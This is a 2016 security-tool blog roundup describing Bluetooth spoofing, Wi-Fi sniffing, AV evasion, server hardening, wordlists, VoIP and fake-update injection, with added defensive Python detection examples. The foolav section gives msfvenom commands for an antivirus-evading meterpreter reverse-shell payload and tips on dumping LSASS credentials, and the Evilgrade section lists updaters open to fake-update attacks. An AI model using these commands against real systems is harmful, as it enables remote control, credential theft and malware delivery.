
Tuesday, January 19, 2016

Automatic Bluetooth Spoofing - Spooftooph



Spooftooph is designed to automate spoofing or cloning of a Bluetooth device's Name, Class, and Address. Cloning this information effectively allows a Bluetooth device to hide in plain sight: Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information (specifically the same Address) while the devices are in Discoverable Mode.




Features

  • Clone and log Bluetooth device information
  • Generate a random new Bluetooth profile
  • Change Bluetooth profile every X seconds
  • Specify device information for Bluetooth interface
  • Select device to clone from scan log


Spooftooph has several options for Bluetooth device information modification:

Option 1: Continuously scan an area for Bluetooth devices. Make a selection on which device in the list to clone. This option also allows for logging of the scanned devices.

Option 2: Randomly generate and assign valid Bluetooth interface information. The class and address are randomly generated and the name is derived from a list of the top 100 most common names in the US and the type of device. For example, if the randomly generated class is a phone, Spooftooph might generate the name “Bob’s Phone”.

Option 3: Specify the name, class, and address a user wishes for the Bluetooth interface to have.

Option 4: Read in the log of previous scans and select a device to clone. Users can also manually add Bluetooth profiles to these log files.

Option 5: Incognito mode. Scan for and clone new devices at user assigned intervals.

This tool is heavily based on bdaddr (by Marcel Holtmann) and hciconfig (by Qualcomm Incorporated, Maxim Krasnyansky, and Marcel Holtmann) from BlueZ.



Usage

To modify the Bluetooth adapter, Spooftooph must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.

spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c

2) Randomly generate NAME, CLASS and ADDR.

spooftooph -i hci0 -R

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.

spooftooph -i hci0 -s -w file.csv

4) Load in device info from log file and specify device info to clone.

spooftooph -i hci0 -r file.csv

5) Clone a random in-range device's info every X seconds.

spooftooph -i hci0 -t 10
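Two checks a defender can run against the kind of scan log Spooftooph writes, as an added example that is not Spooftooph's own code: decoding the Class of Device value (the 0x1c010c from mode 1) into its major class and service bits, and flagging addresses whose name or class changes between scans, which is what a rotating or cloned profile looks like from the outside. The CSV layout (ts,address,name,class) and every record are constructed assumptions, not Spooftooph's real log format.

```python
"""Decode Bluetooth Class-of-Device (CoD) values and hunt a scan log for profiles
that change under one address. Added example, not Spooftooph's own code; the CSV
layout (ts,address,name,class) and the records are constructed assumptions."""
import csv
import io
from collections import defaultdict

# Major device class lives in bits 8-12, minor class in bits 2-7, service bits from 13 up.
MAJOR_CLASSES = {0: "Misc", 1: "Computer", 2: "Phone", 3: "LAN/AP", 4: "Audio/Video",
                 5: "Peripheral", 6: "Imaging", 7: "Wearable", 8: "Toy", 9: "Health",
                 31: "Uncategorized"}
SERVICE_BITS = {13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
                18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
                22: "Telephony", 23: "Information"}


def decode_cod(cod):
    """Return (major class name, minor class number, [service names]) for a 24-bit CoD."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    services = [name for bit, name in SERVICE_BITS.items() if cod & (1 << bit)]
    return MAJOR_CLASSES.get(major, "Reserved"), minor, services


def profile_changes(log_text):
    """Map address -> [(ts, name, cod)] for every address whose name or class changed
    between scans. A genuine device keeps its profile; an adapter rotating profiles
    behind one address, or a cloned address answering with a different name/class
    than the real device, shows up here."""
    seen = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        seen[row["address"].upper()].append((row["ts"], row["name"], int(row["class"], 16)))
    return {addr: recs for addr, recs in seen.items()
            if len({(name, cod) for _, name, cod in recs}) > 1}


# Constructed scan log: three inquiry rounds; one address flips between two profiles.
SAMPLE_LOG = """ts,address,name,class
1,00:11:22:33:44:55,Bob's Laptop,0x1c010c
1,AA:BB:CC:DD:EE:01,Desk Phone,0x5a020c
2,00:11:22:33:44:55,Bob's Laptop,0x1c010c
2,AA:BB:CC:DD:EE:01,Alice's Phone,0x5a0204
3,AA:BB:CC:DD:EE:01,Desk Phone,0x5a020c
"""

if __name__ == "__main__":
    print(decode_cod(0x1c010c))  # -> ('Computer', 3, ['Rendering', 'Capturing', 'Object Transfer'])
    for addr, recs in profile_changes(SAMPLE_LOG).items():
        print(addr, "changed profile:", recs)
```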




Wireless Network Monitoring Tool - Kismet




Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card that supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones (see below), only one type of wireless hardware is supported as a packet source there.


Features

  • Ethereal/Tcpdump compatible data logging
  • Airsnort compatible weak-IV packet logging
  • Network IP range detection
  • Built-in channel hopping and multicard split channel hopping
  • Hidden network SSID decloaking
  • Graphical mapping of networks
  • Client/Server architecture allows multiple clients to view a single Kismet server simultaneously
  • Manufacturer and model identification of access points and clients
  • Detection of known default access point configurations
  • Runtime decoding of WEP packets for known networks
  • Named pipe output for integration with other tools, such as a layer 3 IDS like Snort
  • Multiplexing of multiple simultaneous capture sources on a single Kismet instance
  • Distributed remote drone sniffing
  • XML output
  • Over 20 supported card types





Kismet differs from other wireless network detectors in working passively. Namely, without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and to associate them with each other. It is also the most widely used and up to date open source wireless monitoring tool.

Kismet also includes basic wireless IDS features, such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.

Kismet features the ability to log all sniffed packets and save them in a tcpdump/Wireshark or Airsnort compatible file format. Kismet can also capture “Per-Packet Information” headers. Kismet also features the ability to detect default or “not configured” networks, probe requests, and determine what level of wireless encryption is used on a given access point.

To find as many networks as possible, Kismet supports channel hopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence whose default leaves large gaps between consecutive channels (for example, 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage of this method is that it captures more packets, because adjacent channels overlap.
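A small model that reproduces the default hop order above and quantifies why it beats hopping 1, 2, 3, ... in order, as an added example that is not Kismet's code. It assumes the default order is "advance 5 channels per dwell, wrapping over the 14 channels of 2.4 GHz", and that a 22 MHz wide channel on 5 MHz spacing is audible from a card tuned up to two channels away.

```python
"""Model Kismet's non-sequential channel hopping on 2.4 GHz. Added example, not
Kismet's code; the hop rule (advance 5 channels per dwell, wrapping over 14) and the
overlap model (a channel is heard while tuned within +/-2 channels of it) are
assumptions that reproduce the default order quoted in the text."""
from math import gcd


def hop_sequence(channels=14, step=5):
    """Visit every channel once, advancing `step` channels per hop with wrap-around.
    step=5 over 14 channels yields 1-6-11-2-7-12-3-8-13-4-9-14-5-10."""
    if gcd(step, channels) != 1:
        raise ValueError("step must be coprime with the channel count to cover every channel")
    return [(i * step) % channels + 1 for i in range(channels)]


def worst_wait(seq, spread=2):
    """Longest number of dwells any channel goes unheard while cycling through `seq`,
    counting a channel as heard whenever the tuned channel is within `spread` of it.
    Lower is better: every channel gets looked at more evenly over the cycle."""
    n = len(seq)
    worst = 0
    for ch in range(1, max(seq) + 1):
        hits = [i for i, tuned in enumerate(seq) if abs(tuned - ch) <= spread]
        if not hits:               # never audible in this cycle: wait is the whole cycle
            worst = max(worst, n)
            continue
        gaps = [hits[j + 1] - hits[j] for j in range(len(hits) - 1)]
        gaps.append(n - hits[-1] + hits[0])  # wrap-around gap between cycles
        worst = max(worst, max(gaps))
    return worst


if __name__ == "__main__":
    sequential = list(range(1, 15))
    hopping = hop_sequence()
    print("default order:", "-".join(map(str, hopping)))
    print("worst wait, sequential hopping:", worst_wait(sequential), "dwells")  # 12
    print("worst wait, default hopping:   ", worst_wait(hopping), "dwells")     # 8
```

With sequential hopping the edge channels (1 and 14) are heard for three consecutive dwells and then ignored for twelve; the stepped order spreads those three chances across the cycle, so no channel waits more than eight dwells.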


Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.



Pentest - Security Cheatsheets



Security Cheatsheets

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets is to aid penetration testers, CTF participants and security enthusiasts in remembering commands that are useful but not frequently used. Most of the tools covered have been included in our class and are available in Kali Linux.

Requirements

The only requirement to use these cheatsheets is for cheat to be installed.

How to Use

To use these cheatsheets, copy the cheatsheets in this repository into the ~/.cheat/ directory. After the files are in that directory, cheat ncat will display the ncat cheatsheet.




Antivirus Evasion - foolav



foolav

An executable compiled from this code is useful during penetration tests where there is a need to execute some payload (meterpreter, maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files, the binary executable and the payload file, into the same directory.


Usage steps

1. Prepare your payload (x86), e.g.

calc:  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you don't really need to use any encoder or character blacklisting; it will work anyway)

meterpreter:  msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

2. Copy the payload file [executable-name-without-exe-extension].mf into the same directory as the executable. The payload file for calc.exe generated with the command above begins with the label # calc.exe followed by the shellcode written as \xHH escapes.


3. Once the executable is run, the payload file is parsed, loaded into a separate thread and executed in memory.




Hints


  • The x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, an x86 meterpreter payload can be migrated to x86_64 processes. After that, load kiwi will load the x86_64 version, making it possible to access the juicy contents of LSASS process memory :)
  • The .mf payload file can be obfuscated: the parser ignores every character other than \xHH hexadecimal sequences. This means you can append your payload to almost any file, hide it between the lines, or even add your own comments.
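The parsing rule in the second hint cuts both ways: because anything that is not a \xHH escape is discarded, a hunter can apply the same rule to arbitrary files and flag the ones carrying far more escape-encoded bytes than a normal text or source file would. This is an added detection example, not foolav's code; the two sample files, the hidden content (plain ASCII text, not a payload) and the 64-byte threshold are all constructed.

```python
"""Hunting check for foolav-style .mf payload files. The loader keeps only \\xHH
escapes and discards everything else, so the payload can sit inside prose, comments
or another file. Added example, not foolav's code; the sample files and the 64-byte
threshold are constructed for illustration."""
import re

ESCAPE = re.compile(rb"\\x([0-9a-fA-F]{2})")


def extract_escapes(data: bytes) -> bytes:
    """Apply the parsing rule from the hints above: decode every \\xHH escape in
    order and ignore all other bytes."""
    return bytes(int(m.group(1), 16) for m in ESCAPE.finditer(data))


def assess(data: bytes, min_bytes: int = 64) -> dict:
    """Summarise how much escape-encoded content a file carries and whether it
    crosses the threshold a hunter would treat as a likely embedded payload."""
    payload = extract_escapes(data)
    ratio = (len(payload) * 4) / max(len(data), 1)  # share of the file that is escapes
    return {"escaped_bytes": len(payload), "escape_ratio": round(ratio, 2),
            "suspicious": len(payload) >= min_bytes}


def as_escapes(raw: bytes) -> str:
    """Helper for building constructed samples in the .mf notation."""
    return "".join(f"\\x{b:02x}" for b in raw)


# Constructed samples: an ordinary note, and a note with 117 bytes of plain ASCII
# hidden between its lines in \xHH form (the hidden content is text, not code).
HIDDEN = b"CONSTRUCTED SAMPLE, NOT A REAL PAYLOAD " * 3
BENIGN = b"Meeting notes\nNull bytes are written as \\x00 in C strings.\n"
PADDED = (b"Meeting notes\n" + as_escapes(HIDDEN[:40]).encode() + b"\n"
          b"# reminder: buy coffee\n" + as_escapes(HIDDEN[40:]).encode() + b"\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("padded", PADDED)):
        print(label, assess(sample))
    print(extract_escapes(PADDED))
```

The ratio is reported alongside the count because a file padded with harmless text, as the hint suggests, keeps the byte count high while driving the ratio down, so the count is the signal to alert on.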




Razorback




The new Razorback platform developed by Sourcefire is basically a tool for tying together the various layers of detection within an organization, including antivirus, IDS/IPS, Web and email gateways, and firewalls, to use in concert to catch and examine potential threats and create mitigations on the fly.




Its creators say it’s not the same thing as a security information management tool, however, because it does more than capture events: “SIM collects events in a vacuum: It takes an AV event and says this host is infected by a virus … It doesn’t know anything about that piece of malware on the box,” says Matt Watchinski, senior director of Sourcefire’s vulnerability research team.




LAMP/LEMP Secure Deployment - JShielder



JShielder is an open source tool developed to help sysadmins and developers secure the Linux servers on which they will be deploying a web application. This tool automates the process of installing all the packages necessary to host a web application and hardening the Linux server, with little interaction from the user.

This tool is a Bash script with a small Python script that hardens the Linux server automatically. The steps followed are:
  • Configures a hostname
  • Reconfigures the timezone
  • Updates the entire system
  • Creates a new admin user so you can manage your server safely without making remote connections as root
  • Generates secure RSA keys, so that remote access to your server is done exclusively from your local PC and not with a conventional password
  • Configures, optimizes and secures the SSH server
  • Configures IPTABLES rules to protect the server from common attacks
  • Protects the server against brute-force attacks by installing and configuring fail2ban
  • Stops port scans by blocking intrusive IPs via IPTABLES using portsentry
  • Installs, configures and optimizes MySQL
  • Installs the Apache web server
  • Installs, configures and secures PHP
  • Secures Apache via its configuration file and by installing the ModSecurity, ModEvasive, QoS and SpamHaus modules
  • Installs RootKit Hunter
  • Secures the root home and GRUB configuration files
  • Installs Unhide to help detect malicious hidden processes
  • Installs Tiger, a security auditing and intrusion prevention system
  • Restricts access to Apache config files
  • Disables compilers
  • Creates a daily cron job for system updates
  • Kernel hardening via a sysctl configuration file

Recently Added Hardening Steps

  • Added PHP Suhosin Installation to protect PHP Code and Core for Known and Unknown flaws
  • Use of Function for code execution customization
  • Distro Selection Menu
  • Function Selection Menu
  • Deployment Selection Menu (LAMP, LEMP, Reverse Proxy)
  • Added LEMP Deployment with ModSecurity
  • Added /tmp folder Hardening
  • Added PSAD IDS installation
  • Added Process Accounting
  • Added Unattended Upgrades
  • Added MOTD and Banners for Unauthorized access
  • Disable USB Support for Improved Security (Optional)
  • Restrictive Default UMASK
  • Added Additional Hardening Steps

To run the tool, as the root user:

./jshielder.sh

ChangeLog

v2.0 - More deployment options, selection menu, PHP Suhosin installation, cleaner code
v1.0 - New Code



Wordlist Generator - Crunch





Crunch is a wordlist generator that can use either a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.


Features

  • crunch generates wordlists in both combination and permutation ways
  • it can break up output by number of lines or file size
  • now has resume support
  • pattern now supports numbers and symbols
  • pattern now supports upper and lower case characters separately
  • adds a status report when generating multiple files
  • new -l option for literal support of @,%^
  • new -d option to limit duplicate characters; see the man file for details
  • now has unicode support



SIP Witch





GNU SIP Witch is a secure peer-to-peer VoIP server that uses the SIP protocol. Calls can be made peer-to-peer behind NAT firewalls, and without needing a service provider. GNU SIP Witch supports using secure telephone extensions, for placing and receiving calls directly over the Internet, and intercept-free peer-to-peer audio and video extensions. GNU SIP Witch also is being introduced as a desktop VoIP mediation service to enable the construction of participatory bottom-up secure calling networks and to enable replacement of Skype with free software and published protocols. As a desktop mediation service, GNU SIP Witch can solve issues like NAT in one place for all user agents, and offer new ways to route and redirect VoIP much like gstreamer does for desktop media.

GNU Bayonne is the telephony server of GNU Telephony and the GNU Project. The production release of GNU Bayonne 1 is 1.2.15, and it has a long history in production telecommunication environments. GNU Bayonne supports IVR scripting using hardware from Voicetronix, Dialogic, Aculab, CAPI drivers, and Quicklink drivers under GNU/Linux. GNU Bayonne 1 can integrate Perl and Python applications, and has been commercially deployed in production use for several years. Future releases of GNU Bayonne will be based on ucommon and will further explore its role as a telephony integration server.

GNU SIP Witch is a call and registration server for the SIP protocol. As a call server it services call registration for SIP devices and destination routing through SIP gateways. GNU SIP Witch does not perform codec operations or media proxying, and thereby enables SIP endpoints to directly negotiate call settings with each other and stream media peer to peer, even when multiple SIP Witch call nodes at multiple locations are involved. This means GNU SIP Witch operates without introducing additional media latency or offering a central point for media capture.

GNU SIP Witch is designed to support network scaling of telephony services, rather than the heavily compute-bound solutions we find in use today. This means a call node has a local authentication/registration database, and this will be mirrored, so that any active call node in a cluster will be able to accept and service a call. This allows for the possibility of live failover support in the future as well.

GNU SIP Witch is not a SIP “router”, and does not try to address the same things as a project like iptel “Ser”. GNU SIP Witch is being designed to create on-premise SIP telephone systems, telecenter servers, and Internet hosted SIP telephone systems. One important feature will be the use of URI routing to support direct peer to peer calls between service domains over the public Internet without needing the mediation of an intermediary “service provider”, so that people can publish and call sip: URIs unconstrained. GNU SIP Witch is about freedom to communicate and the removal of artificial barriers and constraints, whether imposed by monopoly service providers or by governments.




Injecting Fake Updates - Evilgrade



Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and its own WebServer and DNSServer modules. New settings are easy to set up, and it autoconfigures when new binary agents are added.


When should I use evilgrade?

This framework comes into play when the attacker is able to make hostname redirections (manipulation of the victim’s DNS traffic), which can be done in two scenarios:

Internal scenario:

  • Internal DNS access
  • ARP spoofing
  • DNS Cache Poisoning
  • DHCP spoofing
  • TCP hijacking
  • Wi-Fi Access Point impersonation


External scenario:

  • Internal DNS access
  • DNS Cache Poisoning


How does it work?

Evilgrade works with modules; each module implements the structure needed to emulate a fake update for a specific application or system.


What OS are supported?

ISR-Evilgrade is cross-platform; it only depends on having an appropriate payload for the target platform to be exploited.


Implemented modules:

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es – (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • more…
  • /docs/CHANGES
